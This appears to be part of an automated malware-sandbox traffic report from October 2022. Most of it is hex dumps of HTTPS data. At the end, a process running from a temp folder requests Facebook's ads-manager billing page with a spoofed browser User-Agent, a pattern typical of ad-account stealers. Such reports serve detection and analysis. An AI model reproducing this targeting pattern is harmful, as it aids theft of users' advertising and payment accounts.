36 18 19 d8 59 29 0e 8b 31 5d 75 ac 64 53 73 e2 51 30 12 a4 75
                                                                                                                                  Data Ascii: U*[@1~< s9d}1Q0_/Rv1]#4U^>Rv1]#4U^>Rv1]#4U^>{v2]#4UZ2D4y~<C-U[2D4\w0y~<7Y)dS~Q0@<6Y)1]udSsQ0u3D$FdS~Q0@<6Y)1]udSsQ0u3D$FdS~Q0@<6Y)1]udSsQ0u
                                                                                                                                  2022-10-17 20:07:17 UTC936INData Raw: 79 25 7a 24 cc c7 5f da cb 15 36 ff 0c 63 a2 28 df 06 c1 f6 a3 5c 03 1b 24 05 41 a3 6f b1 ea 52 2d 5f 6b fd 99 ec 6b 03 db 6b e3 62 66 7d 07 a2 c3 c9 0d 14 77 e4 95 b9 33 f3 bd 22 83 7b 10 ba 0b 33 ed a5 2a 87 7b 2e 94 db e5 0b e3 42 bb 33 4a 8d 17 91 f0 34 ca 1d 96 a4 fa 86 aa 32 a2 1f 4b 0a 82 65 19 a4 b8 9a 17 7f c8 80 d7 f8 2a 3f b1 ef 78 80 06 23 97 9b d8 3e 60 23 c8 3c dd 4d b4 ea 72 23 90 dd 50 81 40 51 0c 67 09 af 32 ea 75 c1 a3 dd 25 0a 9a e4 4e cc c4 8a 57 8b 1f 59 25 72 b6 a6 39 2a b4 10 6f 5f 45 1c c3 49 a8 b6 56 ca 0c 55 7f fd 12 f2 39 35 7d c2 4b c7 0e f6 26 56 51 3f ba 30 24 dd 9e 10 9b 59 b3 60 df 1c f9 51 b6 aa cd de 84 06 c0 29 c1 a8 89 31 78 2a f6 10 db 5a b7 14 8f 2c a7 dc ad 81 db ad 30 64 0c 7d 33 5f 0e 3f 32 c3 cb 53 90 d6 56 8b fe
                                                                                                                                  Data Ascii: y%z$_6c(\$AoR-_kkkbf}w3"{3*{.B3J42Ke*?x#>`#<Mr#P@Qg2u%NWY%r9*o_EIVU95}K&VQ?0$Y`Q)1x*Z,0d}3_?2SV
                                                                                                                                  2022-10-17 20:07:17 UTC943INData Raw: 27 14 ad 89 06 cf 25 80 17 a5 ef 14 60 41 67 23 9a 69 0c 35 ec f2 b0 94 e4 7f 5a 46 77 90 ca ad ed a5 8f 5e 47 ad f0 e8 77 e2 30 25 64 6c ba 7a d0 c1 e6 a7 fe 42 18 14 74 94 35 fd c8 0b 8b e7 86 30 97 11 3a 64 5f ed 83 d0 e2 d0 10 11 59 2a 6f 34 e8 c6 22 9b 7f 13 ac 50 26 4f 4f 7d d7 db 73 4d b8 86 7e a9 f3 97 8d ff 49 5a 83 bb 9e bf ca 93 b0 29 8a e5 96 6b a2 45 1f fc 56 85 78 dd 79 d7 8e f6 f8 b3 36 07 44 02 97 25 1e 18 8a 87 27 be b3 23 cd d3 61 27 9e 95 8f ce 51 6c 44 5d 71 63 78 5d f0 30 3e 2b ed f8 fa e9 f7 92 49 72 87 f1 ad 62 96 cc 72 23 ea 99 b4 c8 32 43 bf 82 96 c4 57 5d 6b f9 68 18 f1 28 13 d4 87 8d d7 5f ad 51 ba ae 46 ca 8a 17 e5 44 cd a6 9b d3 3b f4 91 aa fe 78 70 f2 ee ed ad e0 32 47 4b 8f b9 35 ea 71 31 9a 52 09 4d 32 f6 a2 2f 0d 55 b2 ff
                                                                                                                                  Data Ascii: '%`Ag#i5ZFw^Gw0%dlzBt50:d_Y*o4"P&OO}sM~IZ)kEVxy6D%'#a'QlD]qcx]0>+Irbr#2CW]kh(_QFD;xp2GK5q1RM2/U
                                                                                                                                  2022-10-17 20:07:18 UTC951INData Raw: 88 5d 8c 45 88 5c 8c 4a 88 5c 8c 4a 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 48 88 5c 8b 48 88 5c 8b 48 88 5c 8b 49 88 5c 8b 49 88 5c 8b 49 88 5c 8b 4e 88 5c 8b 4e 88 5c 8b 4e 88 26 43 73 88 e3 7a 62 88 e3 7a 62 88 e3 79 63 88 e3 79 63 88 e3 79 63 88 e2 79 63 58 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e9 84 36 b7 e9 84 36 88 e9 84
                                                                                                                                  Data Ascii: ]E\J\J\J\K\K\K\K\H\H\H\I\I\I\N\N\N&CszbzbycycycycX0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w66
                                                                                                                                  2022-10-17 20:07:18 UTC959INData Raw: 88 ee 83 34 88 ee 83 34 49 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f1 68 13 88 f1 68 13 88 f1 68 13 88 f1 68 10 88 f1 68 10 88 d6 5e 10 88 58 fc 12 88 58 fc 12 88 58 fc 12 88 58 fc 12 88 58 fc 13 88 58 fc 13 88 58 fc 13 88 58 fc 10 88 5f f6 64 88 5d 8f 7c 88 5d 8e 7d 88 5d 8e 7d 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 42 88 5d 8e 42 88 5d 8e 43 88 5d 8e 43 88 5d 8e 43 88 5d 8d 40 88 5d 8d 40 88 5d 8d 40 88 5d 8d 41 88 5d 8d 41 88 5d 8d 41 88 5d 8d 46 88 5d 8d 46 88 5d 8d 46 88 5d 8d 46 88 5d 8d 47 88 5d 8d 47 88 5d 8d 47 88 5d 8c 44 88 5d 8c 44 88 5d 8c 44 88 5d 8c 45 88 5d 8c 45 88 5d 8c 45 88 5c 8c 4a 88 5c 8c 4a 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b
                                                                                                                                  Data Ascii: 44I0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]whhhhh^XXXXXXXX_d]|]}]}]}]B]B]B]C]C]C]@]@]@]A]A]A]F]F]F]F]G]G]G]D]D]D]E]E]E\J\J\J\K\K\K\
                                                                                                                                  2022-10-17 20:07:18 UTC967INData Raw: 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e5 86 33 a7 e4 85 33 88 e4 85 33 88 e4 85 33 88 e4 85 33 88 eb 85 30 d6 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 cc 6b 0d 88 cc 6b 0d 88 f3 6a
                                                                                                                                  Data Ascii: w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w3333300]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]wkkj
                                                                                                                                  2022-10-17 20:07:18 UTC975INData Raw: 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30
                                                                                                                                  Data Ascii: w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0
                                                                                                                                  2022-10-17 20:07:18 UTC982INData Raw: 88 24 40 77 88 24 5f 74 88 24 5f 74 88 2b 5f 74 88 2b 5f 75 88 2b 5f 75 88 2b 5f 75 88 2a 5f 7a 88 2a 5f 7a 88 2a 5e 7a 88 2a 5e 7b 88 2a 5e 7b 88 2a 5e 7b 88 2a 5d 78 88 2a 5d 78 88 29 5d 78 88 29 5d 78 88 2d 5a 7b 88 c1 6b 76 88 e5 73 69 88 ea 71 68 88 ea 71 68 88 ea 70 69 88 ea 70 69 88 ea 70 69 88 e9 0f 6e 88 e9 0f 6e 88 e9 0f 6e 39 ac 30 5d 77 f3 6a 12 73 cf 6e 09 a0 cf 6e 09 88 cf 6e 09 88 ce 6d 0e 88 ce 6d 0e 88 ce 6d 0e 88 cd 6c 0f 88 33 bc 0e 88 44 f4 09 88 58 fd 09 88 58 fd 09 88 58 fd 09 88 58 fd 0e 88 5f f8 1d 88 5e f1 75 88 5d f0 7a 88 5d f0 7a 88 5d f0 7a 88 5d f0 7b 88 5d f0 7b 88 5d f0 7b 88 5d f0 78 88 5d f0 78 88 5d f0 78 88 5d 8f 79 88 5d 8f 79 88 5d 8f 79 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f
                                                                                                                                  Data Ascii: $@w$_t$_t+_t+_u+_u+_u*_z*_z*^z*^{*^{*^{*]x*]x)]x)]x-Z{kvsiqhqhpipipinnn90]wjsnnnmmml3DXXXX_^u]z]z]z]{]{]{]x]x]x]y]y]y]~]~]~]]]]
                                                                                                                                  2022-10-17 20:07:18 UTC990INData Raw: 88 5d 8e 43 88 3c 4a 64 88 f4 63 15 88 fb 62 15 88 fb 62 15 88 fb 62 15 88 fb 61 1a 88 fa 61 1b 47 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ff 7e 1e 58 f8 7e 1e 88 f8 7e 1e 88 f8 7e 1e 88 ff 7e 1e 88 ff 7e 1e 88 3c 4d 1e 88 5f f9 18 88 5f f9 18 88 5f f9 18 88 5f f9 19 88 5f f9 19 88 5f f9 19 88 5f f9 1e 88 5f f9 1e 88 5d f0 78 88 5c 8b 4e 88 5c 8b 4e 88 5c 8b 4e 88 5c 8a 4f 88 5c 8a 4f 88 5c 8a 4f 88 5c 8a 4c 88 5c 8a 4c 88 5c 8a 4c 88 5c 8a 4c 88 5c 8a 4d 88 5c 8a 4d 88 5c 8a 4d 88 5c 89 52 88 5c 89 52 88 5c 89 52 88 5c 89 53 88 5c 89 53 88 5c 89 53 88 5c 89 50 88 5c 89 50 88 5c 89 50 88 5c 88 51 88 5c 88 51 88 5c 88 51 88 5c 88 56 88 5c 88 56 88 5c 88 56 88 5c 88 57 88 5c 88
                                                                                                                                  Data Ascii: ]C<JdcbbbaaG0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w~X~~~~~<M________]x\N\N\N\O\O\O\L\L\L\L\M\M\M\R\R\R\S\S\S\P\P\P\Q\Q\Q\V\V\V\W\
                                                                                                                                  2022-10-17 20:07:18 UTC998INData Raw: 88 ca 51 0a 88 ca 51 0a 88 2d 46 0a 88 58 ff 04 88 58 ff 04 88 58 ff 04 88 58 ff 05 88 58 ff 05 88 58 ff 05 88 58 fe 0a 88 58 fe 0a 88 58 fd 0e 88 5e f2 71 88 5e f2 71 88 5e f2 71 88 5e f1 76 88 5e f1 76 88 5e f1 76 88 5e f1 77 88 5e f1 77 88 5e f1 77 88 5e f1 74 88 5e f1 74 88 5e f1 74 88 5e f1 75 88 5e f1 75 88 5e f1 75 88 5d f0 7a 88 5d f0 7a 88 5d f0 7a 88 5d f0 7a 88 5d f0 7b 88 5d f0 7b 88 5d f0 7b 88 5d f0 78 88 5d f0 78 88 5d f0 78 88 5d 8f 79 88 5d 8f 79 88 5d 8f 79 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f 7f 88 5d 8f 7c 88 5d 8f 7c 88 5d 8f 7c 88 3e 4b 66 88 f6 64 17 88 f6 64 17 88 f5 64 14 88 f5 64 14 88 f5 64 14 88 f4 63 15 47 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30
                                                                                                                                  Data Ascii: QQ-FXXXXXXXXX^q^q^q^v^v^v^w^w^w^t^t^t^u^u^u]z]z]z]z]{]{]{]x]x]x]y]y]y]~]~]~]]]]|]|]|>KfdddddcG0]w0]w0]w0]w0]w0]w0]w0
                                                                                                                                  2022-10-17 20:07:18 UTC1006INData Raw: 88 df 56 19 88 de 56 1e 88 de 56 1e 88 de 56 1e 88 de 55 1e 88 de 55 1e 88 de 55 1e 88 dd 55 1f 88 dd 55 1f 88 dd 55 1f 88 dd 54 1c 88 dd 54 1c 88 dd 54 1c 88 dc 53 1d 88 dc 53 1d 88 dc 53 1d 88 c3 53 1d 88 c3 53 62 88 c3 53 62 88 c3 52 62 88 c2 52 62 88 c2 52 62 88 c2 52 62 88 c2 51 63 88 c2 51 63 88 c2 51 63 88 c1 50 60 88 c1 50 60 88 c1 50 60 88 c1 6f 61 88 c1 6f 61 88 c1 6f 61 88 c0 6f 66 88 c5 6d 66 88 fa 7f 66 88 e0 76 66 88 e0 76 66 88 e0 76 66 88 e7 75 67 88 e7 75 67 88 e7 75 67 88 e7 75 67 88 e6 74 64 89 e6 74 64 40 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 cb 52 05 08 c4 53 04 88 cb 52 04 88 cb 52 04 88 cb 52 04 88 ca 51 05 88 ca 51 05 88 ca 51 05 88 ca 51 0a 88 ca 51 0a 88 ca 51 0a 88 c9 50 0b 88 c9 50 0b 88 c9 50 0b 88 c8 6f 08 88 c8 6f 08 88 c8 6f
                                                                                                                                  Data Ascii: VVVVUUUUUUTTTSSSSSbSbRbRbRbRbQcQcQcP`P`P`oaoaoaofmffvfvfvfugugugugtdtd@0]w0]w0]wRSRRRQQQQQQPPPooo
                                                                                                                                  2022-10-17 20:07:18 UTC1014INData Raw: 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 4b 88 5c 8b 48 88 5c 8b 48 88 c2 50 65 88 fc 7b 62 88 fc 7b 62 88 e3 79 63 6f ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ea 85 30 88 ea 84 31 88 e9 84 36 9f ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f1 68 13 88 f1 68 10 88 c7 53 10 88 58 fc 12 88 58 fc 13 88 58 fc 13 88 58 fc 10 88 5e f2 70 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 43 88 5d 8e 43 88 5d 8d 40 88 5d 8d 40 88 5d 8d 41 88 5d 8d 46 88 5d 8d 46 88 5d 8d 47 88 5d 8c 44 88 5d 8c 44 88 5d 8c
                                                                                                                                  Data Ascii: \J\K\K\H\HPe{b{byco0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0160]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]whhSXXXX^p]}]B]C]C]@]@]A]F]F]G]D]D]
                                                                                                                                  2022-10-17 20:07:18 UTC1022INData Raw: 88 dd 55 1f 88 5f f9 19 88 5f f9 19 88 5f f9 1e 88 5f f9 1e 88 5d 8d 41 88 5c 8a 4f 88 5c 8a 4f 88 5c 8a 4c 88 5c 8a 4d 88 5c 8a 4d 88 5c 89 52 88 5c 89 53 88 5c 89 53 88 5c 89 50 88 5c 88 51 88 5c 88 51 88 5c 88 56 88 5c 88 56 88 5c 88 57 88 5c 88 54 88 5c 88 54 88 5c 87 55 88 43 87 5a 88 fa 7c 6c 88 ea 71 68 88 ea 70 69 88 c8 6f 08 88 c8 6f 08 88 dd 59 08 88 58 fe 0b 88 58 fe 0b 88 58 fe 08 88 58 fe 08 88 5f f5 6b 88 5e f1 74 88 5e f1 75 88 5e f1 75 88 5d f0 7a 88 5d f0 7b 88 5d f0 7b 88 5d f0 78 88 5d f0 78 88 5d 8f 79 88 5d 8f 7e 88 5d 8f 7e 88 5d 8f 7f 88 5d 8f 7c 88 5d 8f 7c 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 42 88 5d 8e 43 88 d8 56 1d 88 fb 62 15 88 fb 61 1a 88 fa 61 1b 6f ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ff 7e 1e 6f f8 7e 1e 88 ff 7e
                                                                                                                                  Data Ascii: U____]A\O\O\L\M\M\R\S\S\P\Q\Q\V\V\W\T\T\UCZ|lqhpiooYXXXX_k^t^u^u]z]{]{]x]x]y]~]~]]|]|]}]B]B]CVbaao0]w0]w0]w0]w~o~~
                                                                                                                                  2022-10-17 20:07:18 UTC1029INData Raw: 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e6 86 32 4c e6 86 32 86 e5 86 32 88 e5 86 33 88 e4 85 33 88 eb 85 30 88 ea 85 30 88 ea 85 30 88 ea 84 31 88 e9 84 36 88 e8 84 36 88 ef 84 37 88 ef 83 37 8e ef 83 37 15 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f2 69 12 88 f1 68 13 88 75 87 12 88 58 fc 12 88 58 fc 13 88 5e f5 6b 88 5d 8f 7c 88 5d 8e 7d 88 5d 8e 42 88 5d 8e 43 88 5d 8d 40 88 5d 8d 41 88 5d 8d 46 88 5d 8d 46 88 5d 8d 47 88 5d 8c 44 88 5d 8c 45 88 5c 8c 4a 88 5c 8b 4b 88 1b a3 78 88 fe 7c 1c 88 fd 7b 1d a6 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 eb 85 30 88 ea 85 30 88 ea 85
                                                                                                                                  Data Ascii: w0]w0]w0]w0]w0]w0]w0]w2L22330001667770]w0]w0]w0]wihuXX^k]|]}]B]C]@]A]F]F]G]D]E\J\Kx|{0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w0]w00
                                                                                                                                  2022-10-17 20:07:18 UTC1037INData Raw: 88 5d 8c 45 88 5c 8b 4b 88 5c 8b 48 88 5c 8b 49 88 f2 65 66 88 e3 79 63 fc ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 e9 84 36 88 e8 84 36 03 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f1 68 10 88 03 a7 10 88 58 fc 10 88 5f f6 60 88 5d 8e 42 88 5d 8d 40 88 5d 8d 41 88 5d 8d 46 88 5d 8d 47 88 5d 8c 45 88 5c 8c 4a 88 5c 8b 4b 88 5c 8b 49 88 f3 65 66 88 e3 7a 62 fc ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ea 84 31 88 e9 84 36 03 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 ac 30 5d 77 f1 68 10 88 03 a7 13 88 58 fc 13 88 5f f7 60 88 5d 8e 42 88 5d 8e 43 88 5d 8d 40 88 5d 8d 46 88 5d 8d
                                                                                                                                  Data Ascii: ]E\K\H\Iefyc0]w0]w0]w0]w0]w0]w0]w0]w0]w660]w0]w0]w0]w0]w0]whX_`]B]@]A]F]G]E\J\K\Iefzb0]w0]w0]w0]w0]w0]w0]w0]w0]w160]w0]w0]w0]w0]w0]whX_`]B]C]@]F]
                                                                                                                                  2022-10-17 20:07:18 UTC1045INData Raw: 4c e9 3c 29 63 27 65 a1 31 97 45 55 05 4b 03 9d 28 f2 6b d6 92 f1 f2 55 77 27 75 a5 78 1b 34 2d fc a8 b3 5e b0 47 d9 08 fc 40 bb 10 7f 9f e2 d6 b6 ca 09 4c 03 a4 b3 9d 75 ca 09 4d 02 54 1b 9c f4 4c ce 00 b5 a8 30 08 fc 40 63 0b 20 27 4d 55 f2 53 44 0a fc f1 3c d8 ac d8 60 0a 9f 6a cf a2 88 ff bb ad 9f 12 cf a2 88 97 c0 28 49 87 ef 9a 32 a4 51 5d 77 ac 3f ea 78 27 e1 52 c0 98 0b d6 b1 ca 0b 10 7f de 36 dc b5 4c cf 5d 77 ca 0b 28 7f de 35 58 97 53 30 5d 11 97 e0 28 79 ca b5 94 03 a9 b3 9a 75 47 ff 6e b7 47 33 6e b7 ec 6f 03 2c f1 f2 55 77 f9 bb b1 13 0d 00 5d 77 ac 66 0a fc ec 3c d6 0f a0 bb aa 88 d9 38 a2 01 9c d8 29 88 53 cf d8 b7 d8 3a d6 41 97 c7 28 9c 9f f0 b6 74 27 76 45 28 f2 6d 9f 73 ac 65 d6 9b 2d dc 79 73 ac 30 de 0a a4 30 0e 21 fb 3f d9 ab a9 30
                                                                                                                                  Data Ascii: L<)c'e1EUK(kUw'ux4-^G@LuMTL0@c 'MUSD<`j(I2Q]w?x'R6L]w(5XS0](yuGnG3no,Uw]wf<8)S:A(t'vE(mse-ys00!?0
                                                                                                                                  2022-10-17 20:07:18 UTC1053INData Raw: 37 10 37 14 37 18 37 1c 37 20 37 24 37 28 37 2c 37 30 37 34 37 38 37 3c 37 40 37 44 37 48 37 4c 37 50 37 54 37 58 37 5c 37 60 37 64 37 68 37 6c 37 70 37 74 37 78 37 7c 37 80 37 84 37 88 37 8c 37 90 37 94 37 98 37 9c 37 a0 37 a4 37 a8 37 b4 37 b8 37 bc 37 c0 37 c4 37 c8 37 cc 37 d0 37 d4 37 d8 37 dc 37 e0 37 e4 37 e8 37 ec 37 f0 37 f4 37 f8 37 fc 37 00 38 04 38 08 38 0c 38 10 38 14 38 18 38 1c 38 20 38 24 38 28 38 2c 38 30 38 34 38 38 38 3c 38 40 38 44 38 48 38 4c 38 50 38 54 38 58 38 5c 38 60 38 c4 3b cc 3b d4 3b dc 3b e4 3b ec 3b f4 3b fc 3b 04 3c 0c 3c 14 3c 1c 3c 24 3c 2c 3c 34 3c 3c 3c 44 3c 4c 3c 54 3c 5c 3c 64 3c 6c 3c 74 3c 7c 3c 84 3c 8c 3c 94 3c 9c 3c a4 3c a0 3d a4 3d a8 3d ac 3d b0 3d b4 3d b8 3d bc 3d c0 3d c4 3d c8 3d cc 3d d0 3d d4 3d d8 3d
                                                                                                                                  Data Ascii: 77777 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|777777777777777777777777777777788888888 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8;;;;;;;;<<<<$<,<4<<<D<L<T<\<d<l<t<|<<<<<<===============


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.54970931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:20 UTC1056OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:20 UTC1056INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
